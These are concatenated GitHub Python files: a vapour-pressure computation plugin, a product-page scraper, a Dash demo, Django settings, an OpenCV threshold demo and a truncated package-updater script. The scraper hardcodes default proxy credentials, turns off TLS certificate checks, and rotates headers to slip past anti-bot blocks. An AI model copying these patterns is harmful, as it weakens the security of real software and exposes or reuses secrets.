px = px_df.at[i, 'd']\n vppr_df.at[i, 'd'] = vppr_from_hu(hu=hu, px=px).astype(np.float32)\n return vppr_df\n\n def 
vapourpressure_from_hr_svp(self, dependencies_df, option):\n logging.info(f'VapourPressure - option {option+1}')\n # dependencies_df = get_intersecting_levels(dependencies_df,self.plugin_mandatory_dependencies[option])\n\n svp_df = get_from_dataframe(dependencies_df, 'SVP')\n hr_df = get_from_dataframe(dependencies_df, 'HR')\n vppr_df = create_empty_result(\n svp_df,\n self.plugin_result_specifications['VPPR'],\n all_rows=True)\n for i in vppr_df.index:\n hr = hr_df.at[i, 'd']\n svp = svp_df.at[i, 'd']\n vppr_df.at[i, 'd'] = vppr_from_hr(\n hr=hr, svp=svp).astype(np.float32)\n return vppr_df\n\n def rpn_vapourpressure_from_tt_td(self, td_df, dependencies_df, option):\n logging.info(f'VapourPressure - rpn option {option+1}')\n\n ttk_df = get_from_dataframe(dependencies_df, 'TT')\n vppr_df = create_empty_result(\n ttk_df, self.plugin_result_specifications['VPPR'], all_rows=True)\n tdk_df = fstpy.unit_convert(td_df, 'kelvin')\n for i in vppr_df.index:\n ttk = ttk_df.at[i, 'd']\n tdk = tdk_df.at[i, 'd']\n vppr_df.at[i,\n 'd'] = rpn_vppr_from_td(td=tdk,\n tt=ttk,\n tpl=(self.temp_phase_switch if self.ice_water_phase != 'water' else -40),\n swph=self.ice_water_phase == 'both').astype(np.float32)\n return vppr_df\n\n def vapourpressure_from_qv_px(self, dependencies_df, option, rpn=False):\n if rpn:\n logging.info(f'VapourPressure - rpn option {option+1}')\n else:\n logging.info(f'VapourPressure - option {option+1}')\n # dependencies_df = get_intersecting_levels(dependencies_df,self.plugin_mandatory_dependencies[option])\n\n qvkgkg_df = get_from_dataframe(dependencies_df, 'QV')\n px_df = get_from_dataframe(dependencies_df, 'PX')\n vppr_df = create_empty_result(\n qvkgkg_df, self.plugin_result_specifications['VPPR'], all_rows=True)\n\n for i in vppr_df.index:\n qv = qvkgkg_df.at[i, 'd']\n px = px_df.at[i, 'd']\n vppr_df.at[i, 'd'] = vppr_from_qv(qv=qv, px=px).astype(np.float32)\n return vppr_df\n\n def vapourpressure_from_tt_td(self, td_df, dependencies_df, option):\n logging.info(f'VapourPressure - option {option+1}')\n\n tt_df = get_from_dataframe(dependencies_df, 'TT')\n vppr_df = create_empty_result(\n tt_df, self.plugin_result_specifications['VPPR'], all_rows=True)\n for i in vppr_df.index:\n tt = tt_df.at[i, 'd']\n td = td_df.at[i, 'd']\n vppr_df.at[i,\n 'd'] = vppr_from_td(td=td - TDPACK_OFFSET_FIX,\n tt=tt - TDPACK_OFFSET_FIX,\n tpl=(self.temp_phase_switch if self.ice_water_phase != 'water' else -40),\n swph=self.ice_water_phase == 'both').astype(np.float32)\n return vppr_df\n\n def rpn_vapourpressure_from_hu_px(self, hu_df, dependencies_df, option):\n logging.info(f'VapourPressure - rpn option {option+1}')\n\n pxpa_df = get_from_dataframe(dependencies_df, 'PX')\n vppr_df = create_empty_result(\n pxpa_df, self.plugin_result_specifications['VPPR'], all_rows=True)\n # pxpa_df = fstpy.unit_convert(px_df, 'pascal')\n for i in vppr_df.index:\n pxpa = pxpa_df.at[i, 'd']\n hu = hu_df.at[i, 'd']\n vppr_df.at[i, 'd'] = rpn_vppr_from_hu(\n hu=hu, px=pxpa).astype(np.float32)\n return vppr_df\n\n def compute_hu(self, dependencies_df):\n from ..humidityspecific import HumiditySpecific\n hu_df = HumiditySpecific(\n pd.concat(\n [\n dependencies_df,\n self.meta_df],\n ignore_index=True),\n ice_water_phase=self.ice_water_phase,\n temp_phase_switch=self.temp_phase_switch,\n temp_phase_switch_unit=self.temp_phase_switch_unit,\n rpn=True, \n dependency_check=self.dependency_check).compute()\n hu_df = get_from_dataframe(hu_df, 'HU')\n return hu_df\n\n def compute_td(self, dependencies_df):\n from 
..temperaturedewpoint import TemperatureDewPoint\n td_df = TemperatureDewPoint(\n pd.concat(\n [\n dependencies_df,\n self.meta_df],\n ignore_index=True),\n ice_water_phase=self.ice_water_phase,\n temp_phase_switch=self.temp_phase_switch,\n temp_phase_switch_unit=self.temp_phase_switch_unit, \n dependency_check=self.dependency_check).compute()\n td_df = get_from_dataframe(td_df, 'TD')\n return td_df\n\n @staticmethod\n def parse_config(args: str) -> dict:\n \"\"\"method to translate spooki plugin parameters to python plugin parameters\n :param args: input unparsed arguments\n :type args: str\n :return: a dictionnary of converted parameters\n :rtype: dict\n \"\"\"\n parser = PluginParser(prog=VapourPressure.__name__, parents=[Plugin.base_parser],add_help=False)\n\n parser.add_argument('--iceWaterPhase',type=str,required=False,choices=[\"WATER\",\"BOTH\"],dest='ice_water_phase', help=\"Switch to determine which phase to consider: ice and water, or, water only.\\nMandatory when using --temperaturePhaseSwitch (Default: BOTH)\")\n parser.add_argument('--temperaturePhaseSwitch',type=str,help=\"Temperature at which to change from the ice phase to the water phase. (Default: -40C)\")\n parser.add_argument('--RPN',action='store_true',default=False,dest=\"rpn\", help=\"Use of the RPN TdPack functions\")\n\n parsed_arg = vars(parser.parse_args(args.split()))\n\n check_and_format_humidity_parsed_arguments(parsed_arg, error_class=VapourPressureError)\n\n return parsed_arg\n","repo_name":"sebastiendfortier/spookipy","sub_path":"spookipy/vapourpressure/vapourpressure.py","file_name":"vapourpressure.py","file_ext":"py","file_size_in_byte":17404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"44525174194","text":"import time\nimport random\nimport os\n\nfrom bs4 import BeautifulSoup\n\nfrom common import request_utils\nfrom common import common_utils\n\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n# Some basic anti bot settings to mask\nUSER_AGENT_FILE = os.path.join(os.path.dirname(__file__), 'user-agents.txt')\nREFERRER_LIST = [\"http:www.google.com\", \"http:www.bing.com\", \"http:www.swisscows.com\", \"http:www.duckduckgo.com\", \"http:www.startpage.com\"]\nBASE_HEADERS = {\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"en-US,en;q=0.9\"}\n\n# Proxy details\nPROXY_USER = os.getenv(\"PROXY_USER\", \"sp70601931\")\nPROXY_PASS = os.getenv(\"PROXY_PASS\", \"Password123!\")\n# PROXY_USER = os.getenv(\"PROXY_USER\", \"\")\n# PROXY_PASS = os.getenv(\"PROXY_PASS\", \"\")\nif not PROXY_USER or not PROXY_PASS:\n print(\"Proxy credentials may be missing. 
Ensure the PROXY_USER and PROXY_PASS environment variables are present on the Lambda configuration page.\")\n\nPROXY_ENDPOINT = f\"http://user-{PROXY_USER}:{PROXY_PASS}@us.smartproxy.com:10000\"\nPROXIES = {\"http\": PROXY_ENDPOINT, \"https\": PROXY_ENDPOINT}\n\n\nclass DetectableScraper(object):\n def __init__(self):\n super(DetectableScraper, self).__init__()\n\n # Read the list of user agents from file\n try:\n with open(USER_AGENT_FILE, \"r\") as f:\n self.user_agent_pool = [line.strip() for line in f.readlines()]\n except Exception as e:\n print(f\"Failed to open the user agent file: {USER_AGENT_FILE} with the error: {e}\")\n\n def make_request(self, url):\n \"\"\"\n Creates a retry session and makes a request to the given url.\n\n If the initial request fails, an attempt is made to get the url\n through a proxy instead\n\n Args:\n url(str): The url to make a request to\n\n Returns:\n requests.Response or None: Returns a request object on a successful request else None\n \"\"\"\n retry_session = request_utils.requests_retry_session(retries=1)\n\n headers = {\"User-Agent\": random.choice(self.user_agent_pool),\n \"Referer\": random.choice(REFERRER_LIST)}\n headers.update(BASE_HEADERS)\n retry_session.headers.update(headers)\n\n try:\n print(f\"Getting {url}\")\n initial_get_start_time = time.time()\n r = retry_session.get(url, headers=headers, timeout=1, stream=True, verify=False)\n print(f\"Initial GET request took {time.time() - initial_get_start_time}s to complete.\")\n except Exception as e:\n print(f\"Initial GET request took {time.time() - initial_get_start_time}s to complete.\")\n print(f\"Timed out getting the page, next attempt is with a proxy\")\n try:\n proxy_get_start_time = time.time()\n r = retry_session.get(url, headers=headers, timeout=1, stream=True, verify=False, proxies=PROXIES)\n print(f\"Proxy GET request took {time.time() - proxy_get_start_time}s to complete.\")\n except Exception as e:\n print(f\"Proxy GET request took {time.time() - proxy_get_start_time}s to complete.\")\n print(f\"Timed out getting the page with proxy, returning\")\n return None\n\n return r\n\n def scrape_page(self, url):\n \"\"\"\n Requests the page at the given url and tries to find the relavent data\n if the request is successful.\n\n Detects a possible IP Ban as well as when an anti cloudflare solution will be needed\n\n Args:\n url(str): The url to make a request to\n\n Returns:\n dict: If data was able to be found, a dict of this data is returned. 
Else a dict\n containing an error message to indicate the anti cloudflare scrape is needed.\n \"\"\"\n response = self.make_request(url)\n\n # Couldn't make a response through a normal request?\n if not response:\n print(f\"Response from {url} failed\")\n print(f\"Possible Bot Detection\")\n return {\"Error\": \"Needs anti-cloudflare request.\"}\n\n soup_parse_time = time.time()\n soup = BeautifulSoup(response.content.decode(\"utf-8\"), \"html.parser\")\n print(f\"Parsing page took {time.time() - soup_parse_time}s to complete.\")\n\n # Connection was made, and data retrieved, but lets check if we have an anti-bot page\n if response.status_code != 200:\n # Check if we've been blocked\n if self.detect_block(soup):\n return {\"Error\": \"Needs anti-cloudflare request.\"}\n return \"\"\n\n data_collection_time = time.time()\n # Check if we can find the OG properties first\n product_name = self.get_meta_tag_info(soup, \"title\")\n product_image = self.clean_url_string(self.get_meta_tag_info(soup, \"image\"))\n product_desc = self.get_meta_tag_info(soup, \"description\")\n\n # If we didn't have a title meta tag, check the title tag instead\n if not product_name:\n title_ele = soup.select(\"title\")\n if title_ele:\n product_name = title_ele[0].contents[0]\n\n # Now look for all of the images likely to be the product\n image_set = self.get_all_images_filtered(soup)\n if product_image:\n image_set = [product_image] + image_set\n\n # Make sure all images are absolute\n final_image_set = set()\n for image_url in image_set:\n final_image_set.add(common_utils.relative_to_absolute_url(url, image_url))\n\n print(f\"Data collection took {time.time() - data_collection_time}s to complete.\")\n return {\"product_name\": product_name,\n \"product_image_urls\": list(final_image_set)[:20], # Take 20 images max\n \"product_description\": product_desc,\n \"status_code\": response.status_code}\n\n @staticmethod\n def contains_cloudflare_text(text):\n \"\"\"\n Checks if a string contains known bot detection alert text\n\n Args:\n text(str): The text to check\n\n Returns:\n bool: True if known text is found else False\n \"\"\"\n return any([x in text.lower() for x in [\"cloudflare\", \"captcha\"]])\n\n @staticmethod\n def detect_block(soup):\n \"\"\"\n Looks through various elements on the page to try and determine whether\n or not we have been blocked by anti-bot\n\n Args:\n soup(BeautifulSoup.Soup): The soup object containing the parsed html\n\n Returns:\n bool: True if it was determined we were detected else False\n \"\"\"\n # Check the title for cloudflare\n title_ele = soup.select(\"title\")\n if title_ele:\n if title_ele[0].contents:\n title_string = title_ele[0].contents[0] or \"\"\n if DetectableScraper.contains_cloudflare_text(title_string):\n return True\n\n body_ele = soup.select(\"body\")\n if body_ele:\n if not body_ele[0].text:\n return True\n for i in body_ele[0].contents:\n if i:\n if DetectableScraper.contains_cloudflare_text(i.text):\n return True\n return False\n\n @staticmethod\n def get_meta_tag_info(soup, name):\n \"\"\"\n Pulls the meta tag information from a parsed page\n\n Args:\n soup(BeautifulSoup.Soup): The soup object containing the parsed html\n name(str): The name of the element to search for\n\n Returns:\n str: The text from the tag if found\n \"\"\"\n meta_tag_ele = soup.find(\"meta\", property=f\"og:{name}\")\n if meta_tag_ele:\n return meta_tag_ele.get(\"content\", \"\")\n return \"\"\n\n @staticmethod\n def clean_url_string(url):\n \"\"\"\n Removes any newlines and spaces found 
at the start/end of a string\n\n Args:\n str(url): The url string to clean up\n\n Returns:\n str: The cleaned up text\n \"\"\"\n return url.replace(\"\\n\", \"\").strip()\n\n @staticmethod\n def get_all_images_filtered(soup):\n \"\"\"\n Searches a parsed html page for all img tags, pulls the src data, and then filters them down\n to the most likely images to be related to the product based.\n\n Args:\n soup(BeautifulSoup.Soup): The soup object containing the parsed html\n\n Returns:\n list(str): A list of found image urls.\n \"\"\"\n image_set = set()\n for img_tag in soup.select(\"img\"):\n img_url = \"\"\n\n # Check which attribute is being used to store the image data\n if img_tag.get(\"srcset\", \"\"):\n img_url = DetectableScraper.clean_url_string(img_tag.get(\"srcset\").split()[0])\n elif img_tag.get(\"src\", \"\"):\n img_url = DetectableScraper.clean_url_string(img_tag.get(\"src\"))\n\n # Only accept the image types likely to represent a product\n if any([x in img_url for x in [\"image\", \"jpg\", \"png\", \"jpeg\"]]):\n if \".svg\" in img_url:\n continue\n if img_url.startswith(\"data:\"):\n continue\n try:\n getHeight = 126\n for i in [\"sh=\", \"hei=\", \"height=\"]:\n tryingToFind = img_url.find(i)\n if tryingToFind != -1:\n s = img_url[tryingToFind+len(i):tryingToFind+(len(i)+4)]\n getHeight = int(s.split('&')[0])\n break\n if getHeight < 125:\n continue\n except:\n print(\"Error parsing height\")\n \n image_set.add(img_url)\n\n return list(image_set)\n","repo_name":"creditsoftware/scraping_websites","sub_path":"scrapers/detectable_scraper.py","file_name":"detectable_scraper.py","file_ext":"py","file_size_in_byte":10056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29002464482","text":"import os\n\nfrom flask import Flask\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\n\n\nserver = Flask(__name__)\n\napp = dash.Dash(name='Bootstrap_docker_app',\n server=server)\n\ncolors = {\n 'background': '#AAA',\n 'text': '#7FDBFF'\n}\n\napp.layout = html.Div(style={'backgroundColor': colors['background']}, children=[\n html.H1(\n children='This is a H1 ',\n style={\n 'textAlign': 'center',\n 'color': colors['text']\n }\n ),\n\n html.Div(children='Dash: Sample Flask App', style={\n 'textAlign': 'center',\n 'color': colors['text']\n }),\n\n dcc.Graph(\n id='example-graph-2',\n figure={\n 'data': [\n {'x': [1, 2, 3], 'y': [4, 1, 2], 'type': 'line', 'name': 'Fridge'},\n {'x': [1, 2, 3], 'y': [2, 4, 5], 'type': 'line', 'name': u'Freezer'},\n ],\n 'layout': {\n 'images': [\n {\n 'xref':\"paper\",\n 'yref':\"paper\",\n 'x':1,\n 'y':1.05,\n 'sizex':0.2,\n 'sizey':0.2,\n 'xanchor':\"right\",\n 'yanchor':\"bottom\"\n }],\n 'plot_bgcolor': colors['background'],\n 'paper_bgcolor': colors['background'],\n 'font': {\n 'color': colors['text']\n }\n }\n }\n )\n])\n\nif __name__ == '__main__':\n debug = os.environ.get(\"DASH_DEBUG\", False)\n app.run_server(debug=debug)\n","repo_name":"bhoy-troy/Plotly-Flask","sub_path":"dash/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10207577207","text":"\"\"\"\nDjango settings for divesandybeach project.\n\n\"\"\"\nimport os\nfrom .config import load_config\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nconfig = load_config(BASE_DIR)\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, 
...)\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/\n\n# Base Application definition settings\nDEBUG = config.DEBUG\nSECRET_KEY = config.SECRET_KEY\n\nSITE_ID = 1\nWSGI_APPLICATION = \"divesandybeach.wsgi.application\"\nROOT_URLCONF = \"divesandybeach.urls\"\nAUTH_USER_MODEL = \"core.User\"\n\n# Static files (CSS, JavaScript, Images)\nSTATIC_URL = \"/static/\"\nMEDIA_URL = \"/media/\"\nSTATIC_ROOT = os.path.join(BASE_DIR, \"static\")\n# STATICFILES_DIRS = [os.path.join(STATIC_ROOT, \"core/\")]\n\n\nINSTALLED_APPS = [\n \"django.contrib.admin\",\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"django.contrib.staticfiles\",\n \"diving.apps.DivingConfig\",\n \"core.apps.CoreConfig\",\n \"django.contrib.sites\",\n \"crispy_forms\",\n \"allauth\",\n \"allauth.account\",\n \"allauth.socialaccount\",\n \"allauth.socialaccount.providers.google\",\n \"allauth.socialaccount.providers.facebook\",\n \"django_extensions\",\n \"snowpenguin.django.recaptcha3\",\n \"tempus_dominus\",\n]\n\nAUTHENTICATION_BACKENDS = [\n \"django.contrib.auth.backends.ModelBackend\",\n \"allauth.account.auth_backends.AuthenticationBackend\",\n]\n\nMIDDLEWARE = [\n \"django.middleware.security.SecurityMiddleware\",\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n]\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [os.path.join(BASE_DIR, \"templates\")],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n \"django.template.context_processors.media\",\n ],\n },\n },\n]\n\n# If debug is true then in development enviornment otherwise in production environment\nif DEBUG == True:\n ALLOWED_HOSTS = [\"*\"]\n\n RECAPTCHA_DISABLE = True\n\n # TODO: Need to change to console once secure, remove host and user\n EMAIL_BACKEND = \"django.core.mail.backends.locmem.EmailBackend\"\n DATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": os.path.join(BASE_DIR, \"db.sqlite3\"),\n }\n }\n\n # Static files (CSS, JavaScript, Images)\n # MEDIA_ROOT = os.path.join(BASE_DIR, \"media_root\")\n\n# Production Environment\nelse:\n ALLOWED_HOSTS = [\n \"divesandybeach.zeroisone.io\",\n \"www.divesandybeach.com\",\n \"divesandybeach.com\",\n \"*\",\n ]\n EMAIL_BACKEND = \"django.core.mail.backends.smtp.EmailBackend\"\n EMAIL_HOST = config.EMAIL_HOST\n EMAIL_HOST_USER = config.EMAIL_HOST_USER\n EMAIL_HOST_PASSWORD = config.EMAIL_HOST_PASSWORD\n EMAIL_USE_TLS = True\n EMAIL_PORT = 587\n\n DATABASES = {\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n # 'HOST': config.DB_HOST,\n \"NAME\": os.path.join(BASE_DIR, \"db.sqlite3\"),\n # 'USER': config.DB_USER,\n # 'PASSWORD': config.DB_PASSWORD,\n }\n }\n\n AUTH_PASSWORD_VALIDATORS = [\n {\n \"NAME\": \"django.contrib.auth.password_validation.UserAttributeSimilarityValidator\",\n },\n {\n \"NAME\": 
\"django.contrib.auth.password_validation.MinimumLengthValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.CommonPasswordValidator\",\n },\n {\n \"NAME\": \"django.contrib.auth.password_validation.NumericPasswordValidator\",\n },\n ]\n\n # Static files (CSS, JavaScript, Images)\n # MEDIA_ROOT = os.path.join(BASE_DIR, \"media_root\")\n\n# Django storages\nSTORAGES = {\n \"default\": {\"BACKEND\": \"divesandybeach.storage.MediaStorage\"},\n \"staticfiles\": {\n \"BACKEND\": \"django.contrib.staticfiles.storage.StaticFilesStorage\",\n },\n}\n# STATICFILES_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'\nAWS_ACCESS_KEY_ID = config.AWS_ACCESS_KEY_ID\nAWS_SECRET_ACCESS_KEY = config.AWS_SECRET_ACCESS_KEY\nAWS_STORAGE_BUCKET_NAME = config.AWS_STORAGE_BUCKET_NAME\nAWS_DEFAULT_ACL = None\nAWS_QUERYSTRING_AUTH = False\n\n# All other settings\n\n# Timezone settings\nDATE_FORMAT = \"%d-%m-%Y\"\nDATE_INPUT_FORMAT = \"%d-%m-%Y\"\nLANGUAGE_CODE = \"en-us\"\nTIME_ZONE = \"Asia/Dubai\"\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n# Django AllAuth settings\nSOCIALACCOUNT_PROVIDERS = config.SOCIALACCOUNT_PROVIDERS\nLOGIN_REDIRECT_URL = \"/\"\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_AUTHENTICATION_METHOD = \"email\"\nACCOUNT_USERNAME_REQUIRED = False\n\n# Crispy Forms\nCRISPY_TEMPLATE_PACK = \"bootstrap4\"\n\nRECAPTCHA_PUBLIC_KEY = config.RECAPTCHA_PUBLIC_KEY\nRECAPTCHA_PRIVATE_KEY = config.RECAPTCHA_PRIVATE_KEY\nRECAPTCHA_DEFAULT_ACTION = \"generic\"\nRECAPTCHA_SCORE_THRESHOLD = 0.5\n\n\n# # Tempus Dominus Settings DateTimePicker\n# TEMPUS_DOMINUS_LOCALIZE = True\n# TEMPUS_DOMINUS_INCLUDE_ASSETS = False\n","repo_name":"subaquatic-pierre/divesandybeach","sub_path":"divesandybeach/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31492336613","text":"import cv2 as cv\nimport numpy as np\n\nmain_win_name = \"threshold\"\ntitles = {\n 0: \"Binary\",\n 1: \"Binary Inverted\",\n 2: \"Threshold Truncated\",\n 3: \"Threshold to Zero\",\n 4: \"Threshold to Zero Inverted\",\n 7: \"Threshold Mask\",\n 8: \"Threshold Otsu\",\n}\n\n\ndef on_trackbar_change(val):\n # 0: Binary\n # 1: Binary Inverted\n # 2: Threshold Truncated\n # 3: Threshold to Zero\n # 4: Threshold to Zero Inverted\n # 8: Threshold Otsu\n for threshold_type in 0, 1, 2, 3, 4, 8:\n\n thresh = src_blur\n\n threshold_value = cv.getTrackbarPos(\"Threshold\", main_win_name)\n threshold_value, thresh = cv.threshold(thresh, threshold_value, 255, threshold_type)\n\n de_kernel = cv.getStructuringElement(cv.MORPH_RECT, (5, 5))\n iterations = cv.getTrackbarPos(\"Iterations\", main_win_name)\n thresh = cv.dilate(thresh, de_kernel, iterations=iterations)\n\n thresh = cv.erode(thresh, de_kernel, iterations=iterations)\n\n canny = cv.getTrackbarPos(\"Canny\", main_win_name)\n thresh = cv.Canny(thresh, canny, canny * 3)\n\n contours, hierarchy = cv.findContours(thresh, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n\n max_corners = cv.getTrackbarPos(\"Corners\", main_win_name)\n # corners = cv.goodFeaturesToTrack(thresh, max_corners, 0.01, 100)\n\n thresh = cv.cvtColor(thresh, cv.COLOR_GRAY2BGR)\n\n hulls_corners = ''\n paper_area = 0\n for contour in contours:\n hull = cv.convexHull(contour)\n\n hull_approx = cv.approxPolyDP(hull, 3, True)\n hull_approx_area = cv.contourArea(hull_approx)\n if (len(hull_approx) == 4) & (hull_approx_area > paper_area):\n paper_area = hull_approx_area\n\n hulls_corners 
+= '{},'.format(len(hull_approx))\n # rect = cv.minAreaRect(hull)\n # box = cv.boxPoints(rect)\n # box = np.int0(box)\n # cv.drawContours(thresh, [box], -1, (0, 0, 255), thickness=3)\n # cv.drawContours(thresh, [contour], -1, (0, 255, 0), thickness=2)\n cv.drawContours(thresh, [hull_approx], -1, (255, 0, 255), thickness=4)\n # cv.drawContours(thresh, [hull], -1, (255, 0, 0), thickness=4)\n\n cv.putText(thresh, \"contours count {}\".format(len(contours)), (10, 10), cv.FONT_HERSHEY_PLAIN, 1, (255, 255, 255))\n cv.putText(thresh, \"all approx corners {}\".format(hulls_corners), (10, 30), cv.FONT_HERSHEY_PLAIN, 1,\n (255, 255, 255))\n cv.putText(thresh, \"threshold {}\".format(threshold_value), (10, 50), cv.FONT_HERSHEY_PLAIN, 1, (255, 255, 255))\n cv.putText(thresh, \"img {} {} {}\".format(len(thresh[0]), len(thresh), len(thresh[0]) * len(thresh)), (10, 70), cv.FONT_HERSHEY_PLAIN, 1, (255, 255, 255))\n cv.putText(thresh, \"paper area {}\".format(paper_area), (10, 90), cv.FONT_HERSHEY_PLAIN, 1, (255, 255, 255))\n\n # lines = cv.HoughLinesP(thresh, 1, np.pi / 180, threshold_value, None, 0, 0)\n # if lines is not None:\n # for i in range(0, len(lines)):\n # line = lines[i][0]\n # cv.line(thresh, (line[0], line[1]), (line[2], line[3]), (0, 255, 0), 3)\n\n # corners = np.int0(corners)\n # for i in corners:\n # x, y = i.ravel()\n # cv.circle(thresh, (x, y), 10, 255, -1)\n\n y = 0\n x_multiplier = threshold_type\n\n if threshold_type > 4:\n y = len(src)\n x_multiplier = threshold_type - 7\n\n x = x_multiplier * len(src[0])\n\n win_name = \"{} {}\".format(main_win_name, titles.get(threshold_type))\n cv.imshow(win_name, thresh)\n cv.moveWindow(win_name, x, y)\n\n\nif __name__ == '__main__':\n print(cv.getVersionString())\n src = cv.imread('resources/images/20200526_121130.jpg', cv.IMREAD_GRAYSCALE)\n src = cv.resize(src, None, fx=0.09, fy=0.09)\n cv.namedWindow(main_win_name, cv.WINDOW_AUTOSIZE)\n cv.imshow(main_win_name, src)\n # src_gray = cv.cvtColor(src, cv.COLOR_BGR2GRAY)\n src_blur = cv.GaussianBlur(src, (7, 7), 0)\n threshold = 190\n cv.createTrackbar(\"Threshold\", main_win_name, threshold, 255, on_trackbar_change)\n cv.createTrackbar(\"Canny\", main_win_name, 60, 255, on_trackbar_change)\n cv.createTrackbar(\"Iterations\", main_win_name, 2, 10, on_trackbar_change)\n cv.createTrackbar(\"Corners\", main_win_name, 4, 50, on_trackbar_change)\n on_trackbar_change(-1)\n cv.waitKey()\n","repo_name":"markfili/edge-detection","sub_path":"thresholds.py","file_name":"thresholds.py","file_ext":"py","file_size_in_byte":4439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"73314092270","text":"\"\"\"\n VDGE Updater is a cross-platform script used to automatically download and move in place all \n the libraries and headers used by the engine.\n Keep in mind that the download links may become unavailable after a while.\n Last archive revision: 25.01.2021\n\"\"\"\n\nimport os\nimport shutil\nfrom sys import platform\nimport json\nimport urllib.request\nimport zipfile\nimport tarfile\nimport time\nimport subprocess\n\n# Tools\ndef join_with_any(base, rel, create_if_not_exists=False):\n path = base\n if rel == '/':\n return path\n for d in rel.split('/'):\n if d == '*':\n any = os.listdir(path)[0]\n path = os.path.join(path, any)\n else:\n path = os.path.join(path, d)\n if not os.path.isdir(path):\n os.mkdir(path)\n return path\n\n# Executable\ndef update(package_file_location, cache_dir_location, include_dir_location, lib_dir_location):\n with 
open(package_file_location, 'r') as f:\n # Read package file\n packageJson = f.read()\n packages = json.loads(packageJson)['data']\n\n # Remove cache directory if it already exists\n if os.path.isdir(cache_dir_location):\n shutil.rmtree(cache_dir_location)\n\n # Compute cachedir path\n cache_dir_path = os.path.join(os.getcwd(), cache_dir_location)\n \n # Create a new cache directory\n os.mkdir(cache_dir_path)\n\n # Library Directory\n if os.path.isdir(lib_dir_location):\n shutil.rmtree(lib_dir_location)\n\n # Compute local lib dir path & create dir\n local_lib_dir_path = lib_dir_location\n os.mkdir(local_lib_dir_path)\n\n # Include Directory\n if os.path.isdir(include_dir_location):\n shutil.rmtree(include_dir_location)\n\n # Compute local include dir path & create dir\n local_include_dir_path = include_dir_location\n os.mkdir(local_include_dir_path)\n\n # Total packages counter\n total_count = 0\n\n for package in packages:\n print ('[>] Installing {}'.format(package['LIB']))\n\n configuration = None\n\n error = False\n\n if 'ANY' in package['PLATFORM']:\n print ('\\t[!] Cross-platform configuration found')\n configuration = package['PLATFORM']['ANY']\n elif (platform == 'linux' or platform == 'linux2' or platform == 'darwin') and ('UNIX' in package['PLATFORM']):\n print ('\\t[!] UNIX configuration found')\n configuration = package['PLATFORM']['UNIX']\n elif (platform == 'win32') and ('WIN' in package['PLATFORM']):\n print ('\\t[!] Windows configuration found')\n configuration = package['PLATFORM']['WIN']\n else:\n print ('\\t[#] No configuration found for {}'.format(platform))\n error = True\n\n base_ctx = None\n ctx = None\n\n # Run package methods\n for method in configuration['METHODS']:\n if error:\n break\n\n if method.startswith('DOWNLOAD'):\n fn = method.split(' ')[1]\n\n print('\\t[>] Downloading from {}:'.format(configuration['LINK']), flush=True, end=' ')\n tfn, _ = urllib.request.urlretrieve(configuration['LINK'])\n ctx = os.path.join(cache_dir_path, fn)\n base_ctx = ctx\n shutil.move(tfn, ctx)\n print('Done!') \n\n elif method.startswith('UNZIP'):\n dn = method.split(' ')[1]\n print ('\\t[>] Unzipping {} to {}:'.format(ctx, dn), flush=True, end=' ')\n with zipfile.ZipFile(ctx, 'r') as zr:\n ctx = os.path.join(cache_dir_location, dn)\n base_ctx = ctx\n zr.extractall(ctx)\n zr.close()\n print('Done!')\n\n elif method.startswith('UNTAR'):\n dn = method.split(' ')[1]\n print ('\\t[>] Tar extract {} to {}:'.format(ctx, dn), flush=True, end=' ')\n with tarfile.open(ctx) as tr:\n ctx = os.path.join(cache_dir_location, dn)\n base_ctx = ctx\n tr.extractall(ctx)\n tr.close()\n print('Done!')\n\n elif method.startswith('CTX'):\n dn = method.split(' ')[1]\n\n print ('\\t[>] Moving context from {}'.format(ctx), flush=True, end=' ')\n\n if dn == '/':\n ctx = base_ctx\n elif dn.startswith('/'):\n ctx = join_with_any(base_ctx, dn[1:])\n else:\n ctx = join_with_any(ctx, dn)\n\n print ('to {}'.format(ctx))\n\n elif method.startswith('HEADER') or method.startswith('LIBRARY'):\n is_header = method.startswith('HEADER')\n no_params = True if is_header and method == 'HEADER' else True if not is_header and method == 'LIBRARY' else False\n\n if no_params:\n bn = 